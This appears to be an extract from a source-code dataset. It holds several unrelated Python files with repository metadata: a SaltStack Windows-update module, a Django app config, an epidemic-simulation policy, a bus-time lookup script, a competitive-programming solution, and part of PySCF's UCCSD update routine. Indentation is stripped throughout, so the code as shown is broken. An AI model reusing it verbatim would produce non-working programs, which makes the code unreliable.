if update.InstallationBehavior.CanRequestUserInput:
log.debug('Skipped update {0}'.format(str(update)))
continue
updates.append(str(update))
log.debug('added update {0}'.format(str(update)))
return updates
def GetSearchResultsPretty(self):
updates = self.GetSearchResults()
ret = 'There are {0} updates. they are as follows:\n'.format(str(len(updates)))
for update in updates:
ret += '\t{0}\n'.format(str(update))
return ret
def SetCategories(self, categories):
self.categories = categories
def GetCategories(self):
return self.categories
def GetAvailableCategories(self):
return self.foundCategories
def SetIncludes(self, includes):
if includes:
for i in includes:
value = i[i.keys()[0]]
include = i.keys()[0]
self.SetInclude(include, value)
log.debug('was asked to set {0} to {1}'.format(include, value))
def SetInclude(self, include, state):
if include == 'UI':
self.skipUI = state
elif include == 'downloaded':
self.skipDownloaded = state
elif include == 'installed':
self.skipInstalled = state
elif include == 'reboot':
self.skipReboot = state
elif include == 'present':
self.skipPresent = state
elif include == 'software':
self.softwareUpdates = state
elif include == 'driver':
self.driverUpdates = state
log.debug('new search state: \n\tUI: {0}\n\tDownload: {1}\n\tInstalled: {2}\n\treboot :{3}\n\tPresent: {4}\n\tsoftware: {5}\n\tdriver: {6}'.format(
self.skipUI, self.skipDownloaded, self.skipInstalled, self.skipReboot,
self.skipPresent, self.softwareUpdates, self.driverUpdates))
def __str__(self):
updates = []
results = 'There are {0} updates, by category there are:\n'.format(
str(self.download_collection.count))
for category in self.foundCategories:
count = 0
for update in self.download_collection:
for c in update.Categories:
if category == c.Name:
count += 1
results += '\t{0}: {1}\n'.format(category, count)
return results
def _search(quidditch, retries=5):
'''
a wrapper method for the pywinupdater class. I might move this into the class, but right now,
that is too much for one class, I think.
'''
passed = False
clean = True
comment = ''
while not passed:
log.debug('Searching. tries left: {0}'.format(str(retries)))
#let the updater make its own search string. MORE POWER this way.
passed = quidditch.AutoSearch()
log.debug('Done searching: {0}'.format(str(passed)))
if isinstance(passed, Exception):
clean = False
comment += 'Failed in the seeking/parsing process:\n\t\t{0}\n'.format(str(passed))
retries -= 1
if retries:
comment += '{0} tries to go. retrying\n'.format(str(retries))
passed = False
else:
comment += 'out of retries. this update round failed.\n'
return (comment, False, retries)
passed = False
if clean:
#bragging rights.
comment += 'Search was done without an error.\n'
return (comment, True, retries)
def _download(quidditch, retries=5):
'''
another wrapper method.
'''
passed = False
clean = True
comment = ''
while not passed:
log.debug('Downloading. tries left: {0}'.format(str(retries)))
passed = quidditch.Download()
log.debug('Done downloading: {0}'.format(str(passed)))
if isinstance(passed, Exception):
clean = False
comment += 'Failed while trying to download updates:\n\t\t{0}\n'.format(str(passed))
retries -= 1
if retries:
comment += '{0} tries to go. retrying\n'.format(str(retries))
passed = False
else:
comment += 'out of retries. this update round failed.\n'
return (comment, False, retries)
if clean:
comment += 'Download was done without error.\n'
return (comment, True, retries)
def _install(quidditch, retries=5):
'''
and the last wrapper method. keeping things simple.
'''
passed = False
clean = True
comment = ''
while not passed:
log.debug('install_collection is this long: {0}'.format(str(quidditch.install_collection.Count)))
log.debug('Installing. tries left: {0}'.format(str(retries)))
passed = quidditch.Install()
log.info('Done installing: {0}'.format(str(passed)))
if isinstance(passed, Exception):
clean = False
comment += 'Failed while trying to install the updates.\n\t\t{0}\n'.format(str(passed))
retries -= 1
if retries:
comment += '{0} tries to go. retrying\n'.format(str(retries))
passed = False
else:
comment += 'out of retries. this update round failed.\n'
return (comment, False, retries)
if clean:
comment += 'Install was done without error.\n'
return (comment, True, retries)
#this is where the actual functions available to salt begin.
def list_updates(verbose=False, includes=None, retries=5, categories=None):
'''
Returns a summary of available updates, grouped into their non-mutually
exclusive categories.
To list the actual updates by name, add 'verbose' to the call.
you can set the maximum number of retries to n in the search process by
adding: retries=n
various aspects of the updates can be included or excluded. this feature is
still in development.
You can also specify by category of update similarly to how you do includes:
categories=['Windows 7', 'Security Updates']
Some known categories:
Updates
Windows 7
Critical Updates
Security Updates
Update Rollups
CLI Example:
Normal Usage:
.. code-block:: bash
salt '*' win_update.list_updates
Find all critical updates list in detail:
.. code-block:: bash
salt '*' win_update.list_updates categories=['Critical Updates'] verbose
'''
log.debug('categories to search for are: {0}'.format(str(categories)))
quidditch = PyWinUpdater()
if categories:
quidditch.SetCategories(categories)
quidditch.SetIncludes(includes)
#this is where we be seeking the things! yar!
comment, passed, retries = _search(quidditch, retries)
if not passed:
return (comment, str(passed))
log.debug('verbose: {0}'.format(str(verbose)))
if verbose:
return str(quidditch.GetSearchResultsPretty())
return str(quidditch)
def download_updates(includes=None, retries=5, categories=None):
'''
Downloads all available updates, skipping those that require user interaction.
you can set the maximum number of retries to n in the search process by
adding: retries=n
various aspects of the updates can be included or excluded. this feature is
still in development.
You can also specify by category of update similarly to how you do includes:
categories=['Windows 7', 'Security Updates']
Some known categories:
Updates
Windows 7
Critical Updates
Security Updates
Update Rollups
CLI Example:
Normal Usage:
.. code-block:: bash
salt '*' win_update.download_updates
Find all critical updates list in detail:
.. code-block:: bash
salt '*' win_update.download_updates categories=['Critical Updates'] verbose
'''
log.debug('categories to search for are: {0}'.format(str(categories)))
quidditch = PyWinUpdater()
quidditch.SetCategories(categories)
quidditch.SetIncludes(includes)
##this is where we be seeking the things! yar!
comment, passed, retries = _search(quidditch, retries)
if not passed:
return (comment, str(passed))
##this is where we get all the things! i.e. download updates.
comment, passed, retries = _download(quidditch, retries)
if not passed:
return (comment, str(passed))
try:
comment = quidditch.GetDownloadResults()
except Exception as e:
comment = 'could not get results, but updates were installed.'
return 'Windows is up to date. \n{0}'.format(comment)
def install_updates(cached=None, includes=None, retries=5, categories=None):
'''
Downloads and installs all available updates, skipping those that require user interaction.
Add 'cached' to only install those updates which have already been downloaded.
you can set the maximum number of retries to n in the search process by
adding: retries=n
various aspects of the updates can be included or excluded. this feature is
still in development.
You can also specify by category of update similarly to how you do includes:
categories=['Windows 7', 'Security Updates']
Some known categories:
Updates
Windows 7
Critical Updates
Security Updates
Update Rollups
CLI Example:
Normal Usage:
.. code-block:: bash
salt '*' win_update.install_updates
Find all critical updates list in detail:
.. code-block:: bash
salt '*' win_update.install_updates categories=['Critical Updates'] verbose
'''
log.debug('categories to search for are: {0}'.format(str(categories)))
quidditch = PyWinUpdater()
quidditch.SetCategories(categories)
quidditch.SetIncludes(includes)
##this is where we be seeking the things! yar!
comment, passed, retries = _search(quidditch, retries)
if not passed:
return (comment, str(passed))
##this is where we get all the things! i.e. download updates.
comment, passed, retries = _download(quidditch, retries)
if not passed:
return (comment, str(passed))
##this is where we put things in their place!
comment, passed, retries = _install(quidditch, retries)
if not passed:
return (comment, str(passed))
try:
comment = quidditch.GetInstallationResultsPretty()
except Exception as e:
comment = 'could not get results, but updates were installed.'
return 'Windows is up to date. \n{0}'.format(comment)
| 36.494234
| 155
| 0.619628
|
794e2b175b2064a69b919caa321bf90ef310a05d
| 175
|
py
|
Python
|
accounts/apps.py
|
shervinbdndev/Django-Shop
|
baa4e7b91fbdd01ee591049c12cd9fbfaa434379
|
[
"MIT"
] | 13
|
2022-02-25T05:04:58.000Z
|
2022-03-15T10:55:24.000Z
|
accounts/apps.py
|
shervinbdndev/Django-Shop
|
baa4e7b91fbdd01ee591049c12cd9fbfaa434379
|
[
"MIT"
] | null | null | null |
accounts/apps.py
|
shervinbdndev/Django-Shop
|
baa4e7b91fbdd01ee591049c12cd9fbfaa434379
|
[
"MIT"
] | 1
|
2022-03-03T09:21:49.000Z
|
2022-03-03T09:21:49.000Z
|
from django.apps import AppConfig
class AccountsConfig(AppConfig):
default_auto_field = 'django.db.models.BigAutoField'
name = 'accounts'
verbose_name = 'Users'
| 21.875
| 56
| 0.742857
|
794e2bfe5f44ea6368f9d55fe43d49288452b1b8
| 887
|
py
|
Python
|
examples/Policy/Pool_Testing/Generate_policy.py
|
healthbadge/episimmer
|
fcb3f7df812be045e2a6d031cac42080ad850d60
|
[
"BSD-3-Clause"
] | 16
|
2021-04-26T14:52:32.000Z
|
2022-01-22T07:13:06.000Z
|
examples/Policy/Pool_Testing/Generate_policy.py
|
healthbadge/episimmer
|
fcb3f7df812be045e2a6d031cac42080ad850d60
|
[
"BSD-3-Clause"
] | 34
|
2021-05-21T12:53:24.000Z
|
2022-02-09T16:30:40.000Z
|
examples/Policy/Pool_Testing/Generate_policy.py
|
healthbadge/episimmer
|
fcb3f7df812be045e2a6d031cac42080ad850d60
|
[
"BSD-3-Clause"
] | 4
|
2021-04-08T07:52:06.000Z
|
2021-05-29T05:58:15.000Z
|
import random
from episimmer.policy import lockdown_policy, testing_policy
def generate_policy():
policy_list=[]
# Normal Testing
#Normal_Test = Testing_Policy.TestPolicy(lambda x:60)
#Normal_Test.add_machine('Simple_Machine', 200, 0.0, 0.0, 0, 50, 2)
#Normal_Test.set_register_agent_testtube_func(Normal_Test.random_agents(1,1))
#policy_list.append(Normal_Test)
# Group/Pool Testing
Pool_Testing = testing_policy.TestPolicy(lambda x:150)
Pool_Testing.add_machine('Simple_Machine', 200, 0.0, 0.0, 0, 50, 2)
Pool_Testing.set_register_agent_testtube_func(Pool_Testing.random_agents(5,2))
policy_list.append(Pool_Testing)
ATP = lockdown_policy.AgentPolicyBasedLockdown('Testing',['Positive'],lambda x:random.random()<0.95,10)
policy_list.append(ATP)
def event_restriction_fn(agent,event_info,current_time_step):
return False
return policy_list,event_restriction_fn
| 31.678571
| 104
| 0.800451
|
794e2c4069b4986db01441487d2ae21edd4852a0
| 515
|
py
|
Python
|
query.py
|
no13bus/bustime
|
998a8a4489f3ef5310d14d73c93d9fb1690d2f49
|
[
"MIT"
] | 60
|
2015-02-13T01:30:46.000Z
|
2020-01-18T07:07:11.000Z
|
query.py
|
no13bus/bustime
|
998a8a4489f3ef5310d14d73c93d9fb1690d2f49
|
[
"MIT"
] | null | null | null |
query.py
|
no13bus/bustime
|
998a8a4489f3ef5310d14d73c93d9fb1690d2f49
|
[
"MIT"
] | 17
|
2015-02-13T01:48:19.000Z
|
2020-10-07T11:10:54.000Z
|
# coding: utf-8
import click
from api.bustime import BusTime
from config import DISTRICT
if __name__ == '__main__':
lineid = click.prompt(u'请输入线路id。格式为 "城市区号-线路号-0" 或者 "城市区号-线路号-1".\n1正向行使,0逆向行驶\n', value_proc=str)
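# (English: "Please enter the line id, in the format 'city-area-code-line-number-0'
# or 'city-area-code-line-number-1'; 1 means the forward direction, 0 the reverse direction.")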
city = DISTRICT[lineid.split('-')[0]]
search_stop_name_or_id = click.prompt(u'请输入需要查询的站点的名称或者在线路上的序号')
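# (English: "Please enter the name of the stop to query, or its ordinal position on the line.")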
city_dict = dict(BusTime.get_cities())
cityid = city_dict[city]
bustime_result = BusTime.get_bus_realtime(lineid, cityid, search_stop_name_or_id)
print bustime_result
| 34.333333
| 102
| 0.737864
|
794e2e29cb6c15bdf3470e9facce420f0f1267fb
| 636
|
py
|
Python
|
jp.atcoder/abc106/abc106_d/9341820.py
|
kagemeka/atcoder-submissions
|
91d8ad37411ea2ec582b10ba41b1e3cae01d4d6e
|
[
"MIT"
] | 1
|
2022-02-09T03:06:25.000Z
|
2022-02-09T03:06:25.000Z
|
jp.atcoder/abc106/abc106_d/9341820.py
|
kagemeka/atcoder-submissions
|
91d8ad37411ea2ec582b10ba41b1e3cae01d4d6e
|
[
"MIT"
] | 1
|
2022-02-05T22:53:18.000Z
|
2022-02-09T01:29:30.000Z
|
jp.atcoder/abc106/abc106_d/9341820.py
|
kagemeka/atcoder-submissions
|
91d8ad37411ea2ec582b10ba41b1e3cae01d4d6e
|
[
"MIT"
] | null | null | null |
import sys
import numpy as np
I = np.array(sys.stdin.read().split(), dtype=np.int64)
n, m, q = I[:3]
l, r = I[3 : 3 + m * 2].reshape(-1, 2).T
p, q = I[3 + m * 2 :].reshape(-1, 2).T
def main():
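# 2-D difference-array ("imos") trick: for each segment (l, r), the four
# corner updates below add +1 over the rectangle of query points (p, q)
# with p <= l and q >= r. After taking cumulative sums along both axes,
# res[p, q] therefore counts the segments fully contained in [p, q].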
res = np.zeros((n + 2, n + 2), dtype=np.int64)
np.add.at(res, (np.full(m, 1), r), 1)
np.add.at(res, (l + 1, r), -1)
np.add.at(res, (np.full(m, 1), np.full(m, n + 1)), -1)
np.add.at(res, (l + 1, np.full(m, n + 1)), 1)
res = np.cumsum(res, axis=0)
res = np.cumsum(res, axis=1)
ans = res[p, q]
return ans
if __name__ == "__main__":
ans = main()
print(*ans, sep="\n")
| 22.714286
| 59
| 0.484277
|
794e2efbc548b665a7c720c784c20d821699e399
| 43
|
py
|
Python
|
run_generator.py
|
amazonprimedrocomgesaxda/StyleGAN2
|
5440fe431a711c5f70b81f8351e968dcf48a56f3
|
[
"BSD-Source-Code"
] | null | null | null |
run_generator.py
|
amazonprimedrocomgesaxda/StyleGAN2
|
5440fe431a711c5f70b81f8351e968dcf48a56f3
|
[
"BSD-Source-Code"
] | null | null | null |
run_generator.py
|
amazonprimedrocomgesaxda/StyleGAN2
|
5440fe431a711c5f70b81f8351e968dcf48a56f3
|
[
"BSD-Source-Code"
] | null | null | null |
import os as alpha
alpha.system("nvidia-smi")
| 14.333333
| 26
| 0.767442
|
794e2fe9dd7db8aed2ed324869d99cbda273db82
| 52,262
|
py
|
Python
|
pyscf/cc/uccsd.py
|
azag0/pyscf
|
1e3e27b61b3cfd22c9679d2c9851c13b3ebc5a1b
|
[
"Apache-2.0"
] | null | null | null |
pyscf/cc/uccsd.py
|
azag0/pyscf
|
1e3e27b61b3cfd22c9679d2c9851c13b3ebc5a1b
|
[
"Apache-2.0"
] | null | null | null |
pyscf/cc/uccsd.py
|
azag0/pyscf
|
1e3e27b61b3cfd22c9679d2c9851c13b3ebc5a1b
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# Copyright 2014-2020 The PySCF Developers. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Author: Timothy Berkelbach <tim.berkelbach@gmail.com>
#
'''
UCCSD with spatial integrals
'''
import time
from functools import reduce
import numpy as np
from pyscf import lib
from pyscf import ao2mo
from pyscf.lib import logger
from pyscf.cc import ccsd
from pyscf.cc import rccsd
from pyscf.ao2mo import _ao2mo
from pyscf.mp import ump2
from pyscf import scf
from pyscf import __config__
MEMORYMIN = getattr(__config__, 'cc_ccsd_memorymin', 2000)
# This is unrestricted (U)CCSD, in spatial-orbital form.
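# Amplitudes are stored as spin blocks: t1 = (t1a, t1b) and
# t2 = (t2aa, t2ab, t2bb), as unpacked at the top of update_amps below.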
def update_amps(cc, t1, t2, eris):
time0 = time.clock(), time.time()
log = logger.Logger(cc.stdout, cc.verbose)
t1a, t1b = t1
t2aa, t2ab, t2bb = t2
nocca, noccb, nvira, nvirb = t2ab.shape
mo_ea_o = eris.mo_energy[0][:nocca]
mo_ea_v = eris.mo_energy[0][nocca:] + cc.level_shift
mo_eb_o = eris.mo_energy[1][:noccb]
mo_eb_v = eris.mo_energy[1][noccb:] + cc.level_shift
fova = eris.focka[:nocca,nocca:]
fovb = eris.fockb[:noccb,noccb:]
u1a = np.zeros_like(t1a)
u1b = np.zeros_like(t1b)
#:eris_vvvv = ao2mo.restore(1, np.asarray(eris.vvvv), nvirb)
#:eris_VVVV = ao2mo.restore(1, np.asarray(eris.VVVV), nvirb)
#:eris_vvVV = _restore(np.asarray(eris.vvVV), nvira, nvirb)
#:u2aa += lib.einsum('ijef,aebf->ijab', tauaa, eris_vvvv) * .5
#:u2bb += lib.einsum('ijef,aebf->ijab', taubb, eris_VVVV) * .5
#:u2ab += lib.einsum('iJeF,aeBF->iJaB', tauab, eris_vvVV)
tauaa, tauab, taubb = make_tau(t2, t1, t1)
u2aa, u2ab, u2bb = cc._add_vvvv(None, (tauaa,tauab,taubb), eris)
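# cc._add_vvvv computes the same (tau * vvvv) particle-particle ladder terms
# that the commented reference contractions above spell out; the .5 factors
# applied to u2aa and u2bb just below correspond to the 0.5 factors in those
# reference lines.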
u2aa *= .5
u2bb *= .5
Fooa = .5 * lib.einsum('me,ie->mi', fova, t1a)
Foob = .5 * lib.einsum('me,ie->mi', fovb, t1b)
Fvva = -.5 * lib.einsum('me,ma->ae', fova, t1a)
Fvvb = -.5 * lib.einsum('me,ma->ae', fovb, t1b)
Fooa += eris.focka[:nocca,:nocca] - np.diag(mo_ea_o)
Foob += eris.fockb[:noccb,:noccb] - np.diag(mo_eb_o)
Fvva += eris.focka[nocca:,nocca:] - np.diag(mo_ea_v)
Fvvb += eris.fockb[noccb:,noccb:] - np.diag(mo_eb_v)
dtype = u2aa.dtype
wovvo = np.zeros((nocca,nvira,nvira,nocca), dtype=dtype)
wOVVO = np.zeros((noccb,nvirb,nvirb,noccb), dtype=dtype)
woVvO = np.zeros((nocca,nvirb,nvira,noccb), dtype=dtype)
woVVo = np.zeros((nocca,nvirb,nvirb,nocca), dtype=dtype)
wOvVo = np.zeros((noccb,nvira,nvirb,nocca), dtype=dtype)
wOvvO = np.zeros((noccb,nvira,nvira,noccb), dtype=dtype)
mem_now = lib.current_memory()[0]
max_memory = max(0, cc.max_memory - mem_now - u2aa.size*8e-6)
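# The loops below block over the occupied index so that each ovvv/OVVV slice
# fits in memory: max_memory is in MB, each float64 takes 8 bytes, and on the
# order of 3 * nvir**3 doubles of work space are needed per occupied orbital,
# which is what the blksize formulas estimate.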
if nvira > 0 and nocca > 0:
blksize = max(ccsd.BLKMIN, int(max_memory*1e6/8/(nvira**3*3+1)))
for p0,p1 in lib.prange(0, nocca, blksize):
ovvv = eris.get_ovvv(slice(p0,p1)) # ovvv = eris.ovvv[p0:p1]
ovvv = ovvv - ovvv.transpose(0,3,2,1)
Fvva += np.einsum('mf,mfae->ae', t1a[p0:p1], ovvv)
wovvo[p0:p1] += lib.einsum('jf,mebf->mbej', t1a, ovvv)
u1a += 0.5*lib.einsum('mief,meaf->ia', t2aa[p0:p1], ovvv)
u2aa[:,p0:p1] += lib.einsum('ie,mbea->imab', t1a, ovvv.conj())
tmp1aa = lib.einsum('ijef,mebf->ijmb', tauaa, ovvv)
u2aa -= lib.einsum('ijmb,ma->ijab', tmp1aa, t1a[p0:p1]*.5)
ovvv = tmp1aa = None
if nvirb > 0 and noccb > 0:
blksize = max(ccsd.BLKMIN, int(max_memory*1e6/8/(nvirb**3*3+1)))
for p0,p1 in lib.prange(0, noccb, blksize):
OVVV = eris.get_OVVV(slice(p0,p1)) # OVVV = eris.OVVV[p0:p1]
OVVV = OVVV - OVVV.transpose(0,3,2,1)
Fvvb += np.einsum('mf,mfae->ae', t1b[p0:p1], OVVV)
wOVVO[p0:p1] = lib.einsum('jf,mebf->mbej', t1b, OVVV)
u1b += 0.5*lib.einsum('MIEF,MEAF->IA', t2bb[p0:p1], OVVV)
u2bb[:,p0:p1] += lib.einsum('ie,mbea->imab', t1b, OVVV.conj())
tmp1bb = lib.einsum('ijef,mebf->ijmb', taubb, OVVV)
u2bb -= lib.einsum('ijmb,ma->ijab', tmp1bb, t1b[p0:p1]*.5)
OVVV = tmp1bb = None
if nvirb > 0 and nocca > 0:
blksize = max(ccsd.BLKMIN, int(max_memory*1e6/8/(nvira*nvirb**2*3+1)))
for p0,p1 in lib.prange(0, nocca, blksize):
ovVV = eris.get_ovVV(slice(p0,p1)) # ovVV = eris.ovVV[p0:p1]
Fvvb += np.einsum('mf,mfAE->AE', t1a[p0:p1], ovVV)
woVvO[p0:p1] = lib.einsum('JF,meBF->mBeJ', t1b, ovVV)
woVVo[p0:p1] = lib.einsum('jf,mfBE->mBEj',-t1a, ovVV)
u1b += lib.einsum('mIeF,meAF->IA', t2ab[p0:p1], ovVV)
u2ab[p0:p1] += lib.einsum('IE,maEB->mIaB', t1b, ovVV.conj())
tmp1ab = lib.einsum('iJeF,meBF->iJmB', tauab, ovVV)
u2ab -= lib.einsum('iJmB,ma->iJaB', tmp1ab, t1a[p0:p1])
ovVV = tmp1ab = None
if nvira > 0 and noccb > 0:
blksize = max(ccsd.BLKMIN, int(max_memory*1e6/8/(nvirb*nvira**2*3+1)))
for p0,p1 in lib.prange(0, noccb, blksize):
OVvv = eris.get_OVvv(slice(p0,p1)) # OVvv = eris.OVvv[p0:p1]
Fvva += np.einsum('MF,MFae->ae', t1b[p0:p1], OVvv)
wOvVo[p0:p1] = lib.einsum('jf,MEbf->MbEj', t1a, OVvv)
wOvvO[p0:p1] = lib.einsum('JF,MFbe->MbeJ',-t1b, OVvv)
u1a += lib.einsum('iMfE,MEaf->ia', t2ab[:,p0:p1], OVvv)
u2ab[:,p0:p1] += lib.einsum('ie,MBea->iMaB', t1a, OVvv.conj())
tmp1abba = lib.einsum('iJeF,MFbe->iJbM', tauab, OVvv)
u2ab -= lib.einsum('iJbM,MA->iJbA', tmp1abba, t1b[p0:p1])
OVvv = tmp1abba = None
eris_ovov = np.asarray(eris.ovov)
eris_ovoo = np.asarray(eris.ovoo)
Woooo = lib.einsum('je,nemi->mnij', t1a, eris_ovoo)
Woooo = Woooo - Woooo.transpose(0,1,3,2)
Woooo += np.asarray(eris.oooo).transpose(0,2,1,3)
Woooo += lib.einsum('ijef,menf->mnij', tauaa, eris_ovov) * .5
u2aa += lib.einsum('mnab,mnij->ijab', tauaa, Woooo*.5)
Woooo = tauaa = None
ovoo = eris_ovoo - eris_ovoo.transpose(2,1,0,3)
Fooa += np.einsum('ne,nemi->mi', t1a, ovoo)
u1a += 0.5*lib.einsum('mnae,meni->ia', t2aa, ovoo)
wovvo += lib.einsum('nb,nemj->mbej', t1a, ovoo)
ovoo = eris_ovoo = None
tilaa = make_tau_aa(t2[0], t1a, t1a, fac=0.5)
ovov = eris_ovov - eris_ovov.transpose(0,3,2,1)
Fvva -= .5 * lib.einsum('mnaf,menf->ae', tilaa, ovov)
Fooa += .5 * lib.einsum('inef,menf->mi', tilaa, ovov)
Fova = np.einsum('nf,menf->me',t1a, ovov)
u2aa += ovov.conj().transpose(0,2,1,3) * .5
wovvo -= 0.5*lib.einsum('jnfb,menf->mbej', t2aa, ovov)
woVvO += 0.5*lib.einsum('nJfB,menf->mBeJ', t2ab, ovov)
tmpaa = lib.einsum('jf,menf->mnej', t1a, ovov)
wovvo -= lib.einsum('nb,mnej->mbej', t1a, tmpaa)
    eris_ovov = ovov = tmpaa = tilaa = None
eris_OVOV = np.asarray(eris.OVOV)
eris_OVOO = np.asarray(eris.OVOO)
WOOOO = lib.einsum('je,nemi->mnij', t1b, eris_OVOO)
WOOOO = WOOOO - WOOOO.transpose(0,1,3,2)
WOOOO += np.asarray(eris.OOOO).transpose(0,2,1,3)
WOOOO += lib.einsum('ijef,menf->mnij', taubb, eris_OVOV) * .5
u2bb += lib.einsum('mnab,mnij->ijab', taubb, WOOOO*.5)
WOOOO = taubb = None
OVOO = eris_OVOO - eris_OVOO.transpose(2,1,0,3)
Foob += np.einsum('ne,nemi->mi', t1b, OVOO)
u1b += 0.5*lib.einsum('mnae,meni->ia', t2bb, OVOO)
wOVVO += lib.einsum('nb,nemj->mbej', t1b, OVOO)
OVOO = eris_OVOO = None
tilbb = make_tau_aa(t2[2], t1b, t1b, fac=0.5)
OVOV = eris_OVOV - eris_OVOV.transpose(0,3,2,1)
Fvvb -= .5 * lib.einsum('MNAF,MENF->AE', tilbb, OVOV)
Foob += .5 * lib.einsum('inef,menf->mi', tilbb, OVOV)
Fovb = np.einsum('nf,menf->me',t1b, OVOV)
u2bb += OVOV.conj().transpose(0,2,1,3) * .5
wOVVO -= 0.5*lib.einsum('jnfb,menf->mbej', t2bb, OVOV)
wOvVo += 0.5*lib.einsum('jNbF,MENF->MbEj', t2ab, OVOV)
tmpbb = lib.einsum('jf,menf->mnej', t1b, OVOV)
wOVVO -= lib.einsum('nb,mnej->mbej', t1b, tmpbb)
eris_OVOV = OVOV = tmpbb = tilbb = None
eris_OVoo = np.asarray(eris.OVoo)
eris_ovOO = np.asarray(eris.ovOO)
Fooa += np.einsum('NE,NEmi->mi', t1b, eris_OVoo)
u1a -= lib.einsum('nMaE,MEni->ia', t2ab, eris_OVoo)
wOvVo -= lib.einsum('nb,MEnj->MbEj', t1a, eris_OVoo)
woVVo += lib.einsum('NB,NEmj->mBEj', t1b, eris_OVoo)
Foob += np.einsum('ne,neMI->MI', t1a, eris_ovOO)
u1b -= lib.einsum('mNeA,meNI->IA', t2ab, eris_ovOO)
woVvO -= lib.einsum('NB,meNJ->mBeJ', t1b, eris_ovOO)
wOvvO += lib.einsum('nb,neMJ->MbeJ', t1a, eris_ovOO)
WoOoO = lib.einsum('JE,NEmi->mNiJ', t1b, eris_OVoo)
WoOoO+= lib.einsum('je,neMI->nMjI', t1a, eris_ovOO)
WoOoO += np.asarray(eris.ooOO).transpose(0,2,1,3)
eris_OVoo = eris_ovOO = None
eris_ovOV = np.asarray(eris.ovOV)
WoOoO += lib.einsum('iJeF,meNF->mNiJ', tauab, eris_ovOV)
u2ab += lib.einsum('mNaB,mNiJ->iJaB', tauab, WoOoO)
WoOoO = None
tilab = make_tau_ab(t2[1], t1 , t1 , fac=0.5)
Fvva -= lib.einsum('mNaF,meNF->ae', tilab, eris_ovOV)
Fvvb -= lib.einsum('nMfA,nfME->AE', tilab, eris_ovOV)
Fooa += lib.einsum('iNeF,meNF->mi', tilab, eris_ovOV)
Foob += lib.einsum('nIfE,nfME->MI', tilab, eris_ovOV)
Fova += np.einsum('NF,meNF->me',t1b, eris_ovOV)
Fovb += np.einsum('nf,nfME->ME',t1a, eris_ovOV)
u2ab += eris_ovOV.conj().transpose(0,2,1,3)
wovvo += 0.5*lib.einsum('jNbF,meNF->mbej', t2ab, eris_ovOV)
wOVVO += 0.5*lib.einsum('nJfB,nfME->MBEJ', t2ab, eris_ovOV)
wOvVo -= 0.5*lib.einsum('jnfb,nfME->MbEj', t2aa, eris_ovOV)
woVvO -= 0.5*lib.einsum('JNFB,meNF->mBeJ', t2bb, eris_ovOV)
woVVo += 0.5*lib.einsum('jNfB,mfNE->mBEj', t2ab, eris_ovOV)
wOvvO += 0.5*lib.einsum('nJbF,neMF->MbeJ', t2ab, eris_ovOV)
tmpabab = lib.einsum('JF,meNF->mNeJ', t1b, eris_ovOV)
tmpbaba = lib.einsum('jf,nfME->MnEj', t1a, eris_ovOV)
woVvO -= lib.einsum('NB,mNeJ->mBeJ', t1b, tmpabab)
wOvVo -= lib.einsum('nb,MnEj->MbEj', t1a, tmpbaba)
woVVo += lib.einsum('NB,NmEj->mBEj', t1b, tmpbaba)
wOvvO += lib.einsum('nb,nMeJ->MbeJ', t1a, tmpabab)
tmpabab = tmpbaba = tilab = None
Fova += fova
Fovb += fovb
u1a += fova.conj()
u1a += np.einsum('ie,ae->ia', t1a, Fvva)
u1a -= np.einsum('ma,mi->ia', t1a, Fooa)
u1a -= np.einsum('imea,me->ia', t2aa, Fova)
u1a += np.einsum('iMaE,ME->ia', t2ab, Fovb)
u1b += fovb.conj()
u1b += np.einsum('ie,ae->ia',t1b,Fvvb)
u1b -= np.einsum('ma,mi->ia',t1b,Foob)
u1b -= np.einsum('imea,me->ia', t2bb, Fovb)
u1b += np.einsum('mIeA,me->IA', t2ab, Fova)
eris_oovv = np.asarray(eris.oovv)
eris_ovvo = np.asarray(eris.ovvo)
wovvo -= eris_oovv.transpose(0,2,3,1)
wovvo += eris_ovvo.transpose(0,2,1,3)
oovv = eris_oovv - eris_ovvo.transpose(0,3,2,1)
u1a-= np.einsum('nf,niaf->ia', t1a, oovv)
tmp1aa = lib.einsum('ie,mjbe->mbij', t1a, oovv)
u2aa += 2*lib.einsum('ma,mbij->ijab', t1a, tmp1aa)
eris_ovvo = eris_oovv = oovv = tmp1aa = None
eris_OOVV = np.asarray(eris.OOVV)
eris_OVVO = np.asarray(eris.OVVO)
wOVVO -= eris_OOVV.transpose(0,2,3,1)
wOVVO += eris_OVVO.transpose(0,2,1,3)
OOVV = eris_OOVV - eris_OVVO.transpose(0,3,2,1)
u1b-= np.einsum('nf,niaf->ia', t1b, OOVV)
tmp1bb = lib.einsum('ie,mjbe->mbij', t1b, OOVV)
u2bb += 2*lib.einsum('ma,mbij->ijab', t1b, tmp1bb)
eris_OVVO = eris_OOVV = OOVV = None
eris_ooVV = np.asarray(eris.ooVV)
eris_ovVO = np.asarray(eris.ovVO)
woVVo -= eris_ooVV.transpose(0,2,3,1)
woVvO += eris_ovVO.transpose(0,2,1,3)
u1b+= np.einsum('nf,nfAI->IA', t1a, eris_ovVO)
tmp1ab = lib.einsum('ie,meBJ->mBiJ', t1a, eris_ovVO)
tmp1ab+= lib.einsum('IE,mjBE->mBjI', t1b, eris_ooVV)
u2ab -= lib.einsum('ma,mBiJ->iJaB', t1a, tmp1ab)
    eris_ooVV = eris_ovVO = tmp1ab = None
eris_OOvv = np.asarray(eris.OOvv)
eris_OVvo = np.asarray(eris.OVvo)
wOvvO -= eris_OOvv.transpose(0,2,3,1)
wOvVo += eris_OVvo.transpose(0,2,1,3)
u1a+= np.einsum('NF,NFai->ia', t1b, eris_OVvo)
tmp1ba = lib.einsum('IE,MEbj->MbIj', t1b, eris_OVvo)
tmp1ba+= lib.einsum('ie,MJbe->MbJi', t1a, eris_OOvv)
u2ab -= lib.einsum('MA,MbIj->jIbA', t1b, tmp1ba)
    eris_OOvv = eris_OVvo = tmp1ba = None
u2aa += 2*lib.einsum('imae,mbej->ijab', t2aa, wovvo)
u2aa += 2*lib.einsum('iMaE,MbEj->ijab', t2ab, wOvVo)
u2bb += 2*lib.einsum('imae,mbej->ijab', t2bb, wOVVO)
